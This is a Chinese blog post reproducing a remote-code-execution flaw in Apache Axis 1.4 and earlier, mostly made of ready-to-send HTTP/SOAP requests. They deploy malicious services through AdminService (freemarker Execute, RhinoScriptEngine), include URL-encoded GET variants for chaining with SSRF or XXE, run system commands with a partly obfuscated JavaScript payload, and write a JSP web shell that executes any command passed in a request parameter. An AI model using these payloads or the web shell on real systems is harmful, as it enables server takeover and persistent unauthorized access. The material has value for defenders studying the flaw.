正文
Axis <=1.4 RCE 复现
小程序:扫一扫查出行
【扫一扫了解最新限行尾号】
复制小程序
【扫一扫了解最新限行尾号】
复制小程序
1、环境搭建
在idea 上新建项目,然后用tomcat运行即可
2、漏洞复现2、1 freemarker.template.utility.Execute
如果项目里面没有freemarker 就添加,这里添加的是 freemarker-2.3.30.jar
- 创建 freemarkerTest services ,返回Done processing 即表示创建成功,同时访问services页面也可以看到freemarkerTest services
如果项目里面没有freemarker 就添加,这里添加的是 freemarker-2.3.30.jar
POST /services/AdminService HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8083/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: localhost:8083
Content-Length: 632<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<service name="freemarkerTest" provider="java:RPC">
<parameter name="className" value="freemarker.template.utility.Execute"/>
<parameter name="allowedMethods" value="*"/>
</service>
</deployment>
</soapenv:Body>
</soapenv:Envelope>
- GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<service name="freemarkerTest" provider="java:RPC">
<parameter name="className" value="freemarker.template.utility.Execute"/>
<parameter name="allowedMethods" value="*"/>
</service>
</deployment
进行urlencode
%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%2f%3e%0a%09%09%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%2a%22%2f%3e%0a%20%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74http://localhost:8083/services/AdminService?method= 将urlencode之后的值放在此处
- 执行命令
POST /services/freemarkerTest HTTP/1.1
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8083/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: localhost:8083
Content-Length: 671<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<arg0 href="#id0"/>
</exec>
<multiRef id="id0" soapenc:root="0" soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" soapenc:arrayType="xsd:anyType[1]" xsi:type="soapenc:Array" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<multiRef xsi:type="soapenc:string">cmd.exe /c echo 111111</multiRef>
</multiRef>
</soapenv:Body>
</soapenv:Envelope>
或
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://utility.template.freemarker" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<util:exec soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<arguments>
<string xsi:type="soapenc:string">cmd.exe /c whoami</string>
</arguments>
</util:exec>
</soapenv:Body>
</soapenv:Envelope>
- 卸载service
POST /services/AdminService HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8083/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: localhost:8083
Content-Length: 395<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<undeployment xmlns="http://xml.apache.org/axis/wsdd/">
<service name="freemarkerTest"/>
</undeployment>
</soapenv:Body>
</soapenv:Envelope>
http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%66%72%65%65%6d%61%72%6b%65%72%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74
2、2 com.sun.script.javascript.RhinoScriptEngine
jdk <= 1.7 可用 本地复现用的 jdk 1.7.0_79
- 创建services
POST /services/AdminService HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8083/services
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Host: localhost:8083
Content-Length: 1074<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<service name="RhinoScriptEngineServiceTest" provider="java:RPC">
<parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
<parameter name="allowedMethods" value="eval" />
<typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
type="java:javax.script.SimpleScriptContext"
qname="ns:SimpleScriptContext"
serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
xmlns:ns="urn:beanservice" regenerateElement="false">
</typeMapping>
</service>
</deployment>
</soapenv:Body>
</soapenv:Envelope>
- GET 创建service ,配合ssrf xxe 使用(当 "enableRemoteAdmin" 为 "false" )时
!--><deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<service name="RhinoScriptEngineServiceTest" provider="java:RPC">
<parameter name="className" value="com.sun.script.javascript.RhinoScriptEngine" />
<parameter name="allowedMethods" value="eval" />
<typeMapping deserializer="org.apache.axis.encoding.ser.BeanDeserializerFactory"
type="java:javax.script.SimpleScriptContext"
qname="ns:SimpleScriptContext"
serializer="org.apache.axis.encoding.ser.BeanSerializerFactory"
xmlns:ns="urn:beanservice" regenerateElement="false">
</typeMapping>
</service>
</deployment
进行urlencode
http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6a%61%76%61%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%70%72%6f%76%69%64%65%72%73%2f%6a%61%76%61%22%3e%0a%20%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%20%70%72%6f%76%69%64%65%72%3d%22%6a%61%76%61%3a%52%50%43%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%63%6c%61%73%73%4e%61%6d%65%22%20%76%61%6c%75%65%3d%22%63%6f%6d%2e%73%75%6e%2e%73%63%72%69%70%74%2e%6a%61%76%61%73%63%72%69%70%74%2e%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%70%61%72%61%6d%65%74%65%72%20%6e%61%6d%65%3d%22%61%6c%6c%6f%77%65%64%4d%65%74%68%6f%64%73%22%20%76%61%6c%75%65%3d%22%65%76%61%6c%22%20%2f%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%74%79%70%65%4d%61%70%70%69%6e%67%20%64%65%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%44%65%73%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%79%70%65%3d%22%6a%61%76%61%3a%6a%61%76%61%78%2e%73%63%72%69%70%74%2e%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%71%6e%61%6d%65%3d%22%6e%73%3a%53%69%6d%70%6c%65%53%63%72%69%70%74%43%6f%6e%74%65%78%74%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%65%72%69%61%6c%69%7a%65%72%3d%22%6f%72%67%2e%61%70%61%63%68%65%2e%61%78%69%73%2e%65%6e%63%6f%64%69%6e%67%2e%73%65%72%2e%42%65%61%6e%53%65%72%69%61%6c%69%7a%65%72%46%61%63%74%6f%72%79%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%78%6d%6c%6e%73%3a%6e%73%3d%22%75%72%6e%3a%62%65%61%6e%73%65%72%76%69%63%65%22%20%72%65%67%65%6e%65%72%61%74%65%45%6c%65%6d%65%6e%74%3d%22%66%61%6c%73%65%22%3e%0a%20%20%20%20%20%20%20%20%20%20%3c%2f%74%79%70%65%4d%61%70%70%69%6e%67%3e%0a%20%20%20%20%20%20%3c%2f%73%65%72%76%69%63%65%3e%0a%20%20%20%20%3c%2f%64%65%70%6c%6f%79%6d%65%6e%74
- 执行命令
<?xml version='1.0' encoding='UTF-8'?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com">
<soapenv:Body>
<eval xmlns="http://localhost:8083/services/scriptEngine">
<arg0 xmlns=""><![CDATA[function test(){var cmd1='c'; cmd1 += 'm';cmd1 += 'd';cmd1 += '.';cmd1 += 'e'; cmd1 += 'x';cmd1 += 'e';var cmd2 = '/'; cmd2 += 'c'; var pb = new java.lang.ProcessBuilder(cmd1,cmd2,'ver');var process = pb.start(); var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();return ret;}test();]]>
</arg0>
<arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"></arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
- 卸载service
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<undeployment xmlns="http://xml.apache.org/axis/wsdd/">
<service name="RhinoScriptEngineServiceTest"/>
</undeployment>
</soapenv:Body>
</soapenv:Envelope>
http://localhost:8083/services/AdminService?method=%21%2d%2d%3e%3c%75%6e%64%65%70%6c%6f%79%6d%65%6e%74%20%78%6d%6c%6e%73%3d%22%68%74%74%70%3a%2f%2f%78%6d%6c%2e%61%70%61%63%68%65%2e%6f%72%67%2f%61%78%69%73%2f%77%73%64%64%2f%22%3e%0a%20%20%20%20%20%20%3c%73%65%72%76%69%63%65%20%6e%61%6d%65%3d%22%52%68%69%6e%6f%53%63%72%69%70%74%45%6e%67%69%6e%65%53%65%72%76%69%63%65%54%65%73%74%22%2f%3e%0a%20%20%20%20%3c%2f%75%6e%64%65%70%6c%6f%79%6d%65%6e%74
2、3 写文件
- 创建service
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<deployment xmlns="http://xml.apache.org/axis/wsdd/"
xmlns:java="http://xml.apache.org/axis/wsdd/providers/java">
<service name="writeFile2" provider="java:RPC">
<requestFlow>
<handler type="java:org.apache.axis.handlers.LogHandler" >
<parameter name="LogHandler.fileName" value="F:/work/SpringStudy/out/artifacts/axis_rce_test_war_exploded/shell123.jsp" />
<parameter name="LogHandler.writeToConsole" value="false" />
</handler>
</requestFlow>
<parameter name="className" value="java.util.Random" />
<parameter name="allowedMethods" value="*" />
</service>
</deployment>
</soapenv:Body>
</soapenv:Envelope>
- 写文件
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.java">
<soapenv:Header/>
<soapenv:Body>
<util:ints soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<in0 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance"><![CDATA[
<%@page import="java.util.*,java.io.*"%><% if (request.getParameter("c") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("c")); DataInputStream dis = new DataInputStream(p.getInputStream()); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }; p.destroy(); }%>
]]></in0>
<in1 xsi:type="xsd:int" xs:type="type:int" xmlns:xs="http://www.w3.org/2000/XMLSchema-instance">?</in1>
</util:ints>
</soapenv:Body>
</soapenv:Envelope>
参考https://paper.seebug.org/1489/
https://github.com/KibodWapon/Axis-1.4-RCE-Poc
Axis <=1.4 RCE 复现的更多相关文章- CVE-2019-0232:Apache Tomcat RCE复现
CVE-2019-0232:Apache Tomcat RCE复现 0X00漏洞简介 该漏洞是由于Tomcat CGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令 ...
- Spring Boot Actuator H2 RCE复现
0x00 前言 Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程.当Spring Boot Actuator配置不当可能造成 ...
- CVE-2022-22947 Spring Cloud Gateway SPEL RCE复现
目录 0 环境搭建 1 漏洞触发点 2 构建poc 3 总结 参考 0 环境搭建 影响范围: Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Ga ...
- CVE-2019-0708 RCE复现
漏洞环境 192.168.91.136 windows7 6.1.7601 192.168.91.151 kali Windows7 SP1下载链接: ed2k://|file|cn ...
- CVE-2019-10392:Jenkins Git client插件RCE复现
0x00 简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能. 0x01 漏洞概述 Git客 ...
- Redis 4.x RCE 复现学习
攻击场景: 能够访问远程redis的端口(直接访问或者SSRF) 对redis服务器可以访问到的另一台服务器有控制权 实际上就是通过主从特性来 同步传输数据,同时利用模块加载来加载恶意的用来进行命令执 ...
- 代码审计之CVE-2019-9081 Laravel5.7 反序列化 RCE复现分析
本文首发于先知社区:https://xz.aliyun.com/t/5510 环境: php7.2+apache+laravel5.7 漏洞描述: Laravel Framework是Taylor O ...
- Joomla 3.4.6 RCE复现及分析
出品|MS08067实验室(www.ms08067.com) 本文作者:whojoe(MS08067安全实验室SRST TEAM成员) 前言 前几天看了下PHP 反序列化字符逃逸学习,有大佬简化了一下 ...
- CVE-2021-21972 vSphere Client RCE复现,附POC &; EXP
漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi.vCenter Server 等一系列的软件.其中 vCenter Server 为 ESXi 的控制中心,可从单一控 ...
随机推荐- Windows Internals学习笔记(四)Trap Dispatching
参考资料: 1. <Windows Internals> 知识点: ● 陷阱trap:它是一种处理器机制,用以在某一异常或中断出现时,捕捉该执行线程,并将其控制权转交到操作系统中某一固定位 ...
- asp数据链接
asp页面的中的数据库连接要进行唯一名称处理,不然页面中多个连接使用时,会出现连接莫名关闭.数据不能写入,但是页面也没报错.asp可以将有数据库连接的地方,提取成单独的函数.在每个方法单独命名数据库连 ...
- js实现一个砖头在页面拖拉效果
用js实现一个砖头在页面,但鼠标点击拖动时,砖头在页面上形成拖拉效果: 刚开始时: 鼠标点击拖动后: 实现代码: <html> <head> <meta ...
- gulp解决RequireJS
gulp解决RequireJS项目前端缓存问题(二) 前言 这一节,我们主要解决在上一节<使用gulp解决RequireJSs项目前端缓存问题(一)>末尾提到的几个问题: 对通过req ...
- Activity启动过程简要介绍
无论是通过点击应用程序图标来启动Activity,还是通过Activity内部调用startActivity接口来启动新的Activity,都要借助于应用程序框架层的ActivityManagerSe ...
- OOCSS学习(二)
OOCSS —— 面向对象CSS 5.CSS团队精神:CSS最佳团队开发 在本文中,你将学习书写CSS的最佳实践来帮助你避免不一致和冗余;实际上,这样制定标准,简化了团队开发的工作. 1)结构化 (根 ...
- BZOJ 1833: [ZJOI2010]count 数字计数( dp )
dp(i, j, k)表示共i位, 最高位是j, 数字k出现次数. 预处理出来. 差分答案, 对于0~x的答案, 从低位到高位进行讨论 -------------------------------- ...
- 线程锁的概念函数EnterCriticalSection和LeaveCriticalSection的使用方法
线程锁的概念函数EnterCriticalSection和LeaveCriticalSection的使用方法 注:使用结构CRITICAL_SECTION 需增加头文件#include “afxmt. ...
- DDD领域驱动
DDD领域驱动领域驱动模型.模型驱动代码接触到需求第一步就是考虑领域模型,而不是将其切割成数据和行为,然后数据用数据库实现,行为使用服务实现,最后造成需求的首肢分离.DDD让你首先考虑的是业务语言而不 ...
- sql server中如何修改视图中的数据?
sql server中如何修改视图中的数据? 我做个测试,视图的数据有标记字段时,如果是这种方式(0 as FlagState),是无法修改的 --创建视图语句 --- create view V_E ...
https://paper.seebug.org/1489/
https://github.com/KibodWapon/Axis-1.4-RCE-Poc
- CVE-2019-0232:Apache Tomcat RCE复现
CVE-2019-0232:Apache Tomcat RCE复现 0X00漏洞简介 该漏洞是由于Tomcat CGI将命令行参数传递给Windows程序的方式存在错误,使得CGIServlet被命令 ...
- Spring Boot Actuator H2 RCE复现
0x00 前言 Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程.当Spring Boot Actuator配置不当可能造成 ...
- CVE-2022-22947 Spring Cloud Gateway SPEL RCE复现
目录 0 环境搭建 1 漏洞触发点 2 构建poc 3 总结 参考 0 环境搭建 影响范围: Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Ga ...
- CVE-2019-0708 RCE复现
漏洞环境 192.168.91.136 windows7 6.1.7601 192.168.91.151 kali Windows7 SP1下载链接: ed2k://|file|cn ...
- CVE-2019-10392:Jenkins Git client插件RCE复现
0x00 简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能. 0x01 漏洞概述 Git客 ...
- Redis 4.x RCE 复现学习
攻击场景: 能够访问远程redis的端口(直接访问或者SSRF) 对redis服务器可以访问到的另一台服务器有控制权 实际上就是通过主从特性来 同步传输数据,同时利用模块加载来加载恶意的用来进行命令执 ...
- 代码审计之CVE-2019-9081 Laravel5.7 反序列化 RCE复现分析
本文首发于先知社区:https://xz.aliyun.com/t/5510 环境: php7.2+apache+laravel5.7 漏洞描述: Laravel Framework是Taylor O ...
- Joomla 3.4.6 RCE复现及分析
出品|MS08067实验室(www.ms08067.com) 本文作者:whojoe(MS08067安全实验室SRST TEAM成员) 前言 前几天看了下PHP 反序列化字符逃逸学习,有大佬简化了一下 ...
- CVE-2021-21972 vSphere Client RCE复现,附POC &; EXP
漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi.vCenter Server 等一系列的软件.其中 vCenter Server 为 ESXi 的控制中心,可从单一控 ...
随机推荐- Windows Internals学习笔记(四)Trap Dispatching
参考资料: 1. <Windows Internals> 知识点: ● 陷阱trap:它是一种处理器机制,用以在某一异常或中断出现时,捕捉该执行线程,并将其控制权转交到操作系统中某一固定位 ...
- asp数据链接
asp页面的中的数据库连接要进行唯一名称处理,不然页面中多个连接使用时,会出现连接莫名关闭.数据不能写入,但是页面也没报错.asp可以将有数据库连接的地方,提取成单独的函数.在每个方法单独命名数据库连 ...
- js实现一个砖头在页面拖拉效果
用js实现一个砖头在页面,但鼠标点击拖动时,砖头在页面上形成拖拉效果: 刚开始时: 鼠标点击拖动后: 实现代码: <html> <head> <meta ...
- gulp解决RequireJS
gulp解决RequireJS项目前端缓存问题(二) 前言 这一节,我们主要解决在上一节<使用gulp解决RequireJSs项目前端缓存问题(一)>末尾提到的几个问题: 对通过req ...
- Activity启动过程简要介绍
无论是通过点击应用程序图标来启动Activity,还是通过Activity内部调用startActivity接口来启动新的Activity,都要借助于应用程序框架层的ActivityManagerSe ...
- OOCSS学习(二)
OOCSS —— 面向对象CSS 5.CSS团队精神:CSS最佳团队开发 在本文中,你将学习书写CSS的最佳实践来帮助你避免不一致和冗余;实际上,这样制定标准,简化了团队开发的工作. 1)结构化 (根 ...
- BZOJ 1833: [ZJOI2010]count 数字计数( dp )
dp(i, j, k)表示共i位, 最高位是j, 数字k出现次数. 预处理出来. 差分答案, 对于0~x的答案, 从低位到高位进行讨论 -------------------------------- ...
- 线程锁的概念函数EnterCriticalSection和LeaveCriticalSection的使用方法
线程锁的概念函数EnterCriticalSection和LeaveCriticalSection的使用方法 注:使用结构CRITICAL_SECTION 需增加头文件#include “afxmt. ...
- DDD领域驱动
DDD领域驱动领域驱动模型.模型驱动代码接触到需求第一步就是考虑领域模型,而不是将其切割成数据和行为,然后数据用数据库实现,行为使用服务实现,最后造成需求的首肢分离.DDD让你首先考虑的是业务语言而不 ...
- sql server中如何修改视图中的数据?
sql server中如何修改视图中的数据? 我做个测试,视图的数据有标记字段时,如果是这种方式(0 as FlagState),是无法修改的 --创建视图语句 --- create view V_E ...
参考资料: 1. <Windows Internals> 知识点: ● 陷阱trap:它是一种处理器机制,用以在某一异常或中断出现时,捕捉该执行线程,并将其控制权转交到操作系统中某一固定位 ...
asp页面的中的数据库连接要进行唯一名称处理,不然页面中多个连接使用时,会出现连接莫名关闭.数据不能写入,但是页面也没报错.asp可以将有数据库连接的地方,提取成单独的函数.在每个方法单独命名数据库连 ...
用js实现一个砖头在页面,但鼠标点击拖动时,砖头在页面上形成拖拉效果: 刚开始时: 鼠标点击拖动后: 实现代码: <html> <head> <meta ...
gulp解决RequireJS项目前端缓存问题(二) 前言 这一节,我们主要解决在上一节<使用gulp解决RequireJSs项目前端缓存问题(一)>末尾提到的几个问题: 对通过req ...
无论是通过点击应用程序图标来启动Activity,还是通过Activity内部调用startActivity接口来启动新的Activity,都要借助于应用程序框架层的ActivityManagerSe ...
OOCSS —— 面向对象CSS 5.CSS团队精神:CSS最佳团队开发 在本文中,你将学习书写CSS的最佳实践来帮助你避免不一致和冗余;实际上,这样制定标准,简化了团队开发的工作. 1)结构化 (根 ...
dp(i, j, k)表示共i位, 最高位是j, 数字k出现次数. 预处理出来. 差分答案, 对于0~x的答案, 从低位到高位进行讨论 -------------------------------- ...
线程锁的概念函数EnterCriticalSection和LeaveCriticalSection的使用方法 注:使用结构CRITICAL_SECTION 需增加头文件#include “afxmt. ...
DDD领域驱动领域驱动模型.模型驱动代码接触到需求第一步就是考虑领域模型,而不是将其切割成数据和行为,然后数据用数据库实现,行为使用服务实现,最后造成需求的首肢分离.DDD让你首先考虑的是业务语言而不 ...
sql server中如何修改视图中的数据? 我做个测试,视图的数据有标记字段时,如果是这种方式(0 as FlagState),是无法修改的 --创建视图语句 --- create view V_E ...